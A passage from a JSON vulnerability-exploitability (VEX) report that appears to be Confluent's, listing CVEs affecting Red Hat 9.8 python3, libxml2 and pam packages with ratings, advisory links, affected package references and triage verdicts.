          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-11972",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        252,
        606,
        770
      ],
      "description": "When using the \"tarfile\" module with a file opened in \"streaming mode\" (mode=\"r|\") the tarfile module did not properly handle EOF, making archive parsing take exponentially longer.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-11972"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-11972"
        },
        {
          "url": "https://github.com/python/cpython/commit/3f031d431f80668e14f3bc066bbf4369cd9281b9"
        },
        {
          "url": "https://github.com/python/cpython/commit/4ce6bf7c8aa7725828a38981c306f214c1f29365"
        },
        {
          "url": "https://github.com/python/cpython/commit/7f0dc59c9a70f8f3b4da33d7c4a2ba552a7acc21"
        },
        {
          "url": "https://github.com/python/cpython/commit/e86666c9dd256d52d0fbef6feb1ea4a51768fdec"
        },
        {
          "url": "https://github.com/python/cpython/commit/eb63c0f94dfcbea7fda8eab6213818e134d67192"
        },
        {
          "url": "https://github.com/python/cpython/commit/f50bf13566189c8d0ce5a814f33eff3d89951896"
        },
        {
          "url": "https://github.com/python/cpython/commit/f5e2776ff0383a902c12acf2b703e7e951fc8438"
        },
        {
          "url": "https://github.com/python/cpython/issues/151981"
        },
        {
          "url": "https://github.com/python/cpython/pull/151982"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/AXPSKKTSRKXTTJULW3XSIC74WZNAAPPB/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-11972"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-11972"
        }
      ],
      "published": "2026-06-23T23:16:49+00:00",
      "updated": "2026-08-13T01:16:51+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-11979",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.8,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L"
        }
      ],
      "cwes": [
        121
      ],
      "description": "libxml2 is vulnerable to multiple stack-based buffer overflows in the xmlcatalog utility when running in --shell mode. The usershell() function processes user input using fixed-size stack buffers without proper bounds checking.\nBy supplying an overly long input line, an attacker can overflow internal buffers (command, arg, and argv) during input parsing. This results in memory corruption within the stack frame.\nSuccessful exploitation may cause a crash or potentially allow arbitrary code execution in the context of the xmlcatalog process.\n\nThis issue has been fixed in the commit c2e233fc.\n\nNOTE:\nThe maintainers of this project did not agree that this issue is a vulnerability and considered it a bug.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-11979"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-11979"
        },
        {
          "url": "https://cert.pl/en/posts/2026/06/CVE-2026-11979"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/commit/c2e233fc1b341685fc99621b2768b503f777a72e"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-11979"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-11979"
        }
      ],
      "published": "2026-06-29T14:16:40+00:00",
      "updated": "2026-06-30T20:22:07+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.9.13-14.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-12610",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        825
      ],
      "description": "A flaw was found in sssd. When authenticating with a YubiKey, the SSSD PAM responder can crash due to a use-after-free vulnerability, where a memory pointer is incorrectly handled. A local attacker could exploit this flaw by manipulating smartcard or YubiKey contents, leading to a denial of service that disrupts authentication. This vulnerability also presents a potential for privilege escalation, although it is difficult to exploit.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-12610"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-12610"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2490288"
        },
        {
          "url": "https://github.com/SSSD/sssd/issues/8796"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-12610"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-12610"
        }
      ],
      "published": "2026-06-30T10:16:34+00:00",
      "updated": "2026-06-30T20:08:54+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "1.5.1-28.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/pam@1.5.1-28.el9?arch=x86_64&distro=redhat-9.8"
        },
